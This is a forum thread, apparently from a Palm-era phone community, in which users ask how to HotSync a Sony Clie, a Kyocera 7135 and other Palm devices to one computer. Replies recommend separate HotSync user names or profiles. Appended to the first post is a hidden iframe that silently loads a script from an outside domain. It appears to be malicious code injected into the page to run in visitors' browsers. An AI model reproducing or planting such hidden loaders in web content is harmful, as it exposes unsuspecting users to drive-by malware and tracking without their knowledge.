+ Reply to Thread
Page 1 of 2 1 2 LastLast

sony clie and kyocera 7135

I would like to be able to use my Sony Clie and Kyocera 7135 on the same computer. I currently have my Clie setup on my computer. Is there a way so I am able to hotsync both devices on the same computer without messing them both up? Thanks....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: sony clie and kyocera 7135

Originally posted by stu2332
    I would like to be able to use my Sony Clie and Kyocera 7135 on the same computer. I currently have my Clie setup on my computer. Is there a way so I am able to hotsync both devices on the same computer without messing them both up? Thanks....
    yes

Re: Re: sony clie and kyocera 7135

Originally posted by RUYORK
    yes

Well, I certainly got alot out of this
    Thanks for your help!

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

When you sync a new device it will ask you for the device name -- Choose NEW so you don't overwrite the other device's sync settings and you should be fine.
    iPhone therefore iAm.

So there won't be a problem with the fact that one is a phone and one is not? (setting, third party conduits, etc)

As long as you have different user names for the devices, there should not be a problem syncing them to the same computer. At one point I was actually syncing four different devices to my laptop. As long as each device has a distinct user name, you should be fine.

Administrator
    i support marty's comment. you will have no issues as long as you dont mix profiles.

thanks

Originally posted by Marty
    As long as you have different user names for the devices, there should not be a problem syncing them to the same computer. At one point I was actually syncing four different devices to my laptop. As long as each device has a distinct user name, you should be fine.
    You can also install the Desktop to a different directory on your computer. The danger here is that you have to know which copy of Hotsync you are running. Doing it this way, you can have the same HotSync ID.

--John

You can also install the Desktop to a different directory on your computer. The danger here is that you have to know which copy of Hotsync you are running. Doing it this way, you can have the same HotSync ID.
    Could you be more specific about this.
    That is exactly what I'd like to be able to do. My understanding is that if I try to install a second instance of the Palm Desktop, The computer will think force me to to "update" the installation I already have.
    If I read this right you are saying you will actually have two Palm Desktops. Correct?

Administrator
    just follow the "KISS" method and have one installation of palm desktop and just use the profiles... that's the easiest to do.. when you put a phone in and hit the sync, it will ask you which profile.. all you do is select the profile you ewant.... it cant be any simpler...

im not knocking the other method. Palm desktop was designed for more than one user so there is no learning curve needed to have more then one profile...

just follow the "KISS" method and have one installation of palm desktop and just use the profiles... that's the easiest to do..
    Marc - I know how to do that. What I'm looking to do is to have the same stuff on two palms - programs and all. If I decide to go with the 7135 (I'm still considering the I700 Samsung), I don't want to have to re-buy all the programs I just bought for my Tungsten. I would also like to keep my Tungsten as back-up for those occasional, but real hard resets on the road.

Originally posted by jabo
    Marc - I know how to do that. What I'm looking to do is to have the same stuff on two palms - programs and all. If I decide to go with the 7135 (I'm still considering the I700 Samsung), I don't want to have to re-buy all the programs I just bought for my Tungsten. I would also like to keep my Tungsten as back-up for those occasional, but real hard resets on the road.
    When you hot sync your 7135 leave the hotsync settings to sync the files. When you hot sync your Tungsten change the hotsync settings to desktop overrides the handheld. It seems like it might be easier to get backup buddy and backup to the 7135's expasion slot. If you need a hard reset on the road then you can back up from an expansion card and not be down at all.
    If at first you don't succeed, don't try sky diving.

Administrator
    ..or you could go into the palm folder and drag and drop files into your install folder of the other device...

syncing 7135 and another palm device to same desktop computer

I apologize if this has been answered elsewhere, but when I tried to search on this, couldn't find an answer.

My wife has a Sony Clie NX-60 that I have synced with my desktop. I want to sync my 7135 with the same desktop. Is this easy to do?? Or would it be better to only sync one palm type device to one desktop? Or would it work if I logged off on my desktop and logged on as another user (windows2000) when using the different palm devices?

Jim

I truly hope someone has the snswer, I have an NR70V Clie and I ended up having to install the Kyocera 7135 desktop to get my 7135 to HotSync. I have not been able to restablish a connection for my NR70V! It is useless now, but I really want to use both. Any ideas on how I can bring connectivity to both devices on the same PC? Do I need to reinstal the Sony desktop software? Little help here.

Excellent Thread - Thoughts

Looks like I'm in a similiar situation. I have a Clie T665C and am not ready to get rid of it completely. So, I'm interested in how to sync multiple devices to a single desktop as well. Everything I've read so far says that it is not possible. I find that hard to believe, but I'm not smart enought on my own to figure it out. Any of the Palm genuises have any ideas?

I have 3 devices all synching up to the same Palm Desktop (2 7135's and a M505). Keep in mind that each one has to have it's own hotsync name though. Everything is working fine for me. I didn't even have to put in the installation disk with my 7135, just plugged it in, hit the hotsync button, it asked me for a User name and i was in business. Sony is your problem, they modify their software so that it will not work with anything else, i swear if they could invent their own proprietary electricty then they would. But back to your question, i don't know what you need to do to your particular setup to get it to work, but i know it is totally possible.

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

So if I have my wife's M515 cradle plugged into one USB port and my 7135 cradle in another USB port, then I can sync each one separately without having to unplug and replug? I assume the 7135 will work directly with the Palm Desktop.

Yes you can do that. There is no need to load the Kyocera version of Palm Desktop. You will not have to swap cables or anything.

Welcom to the Zen of Palm... (I can't believe I just said that)

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.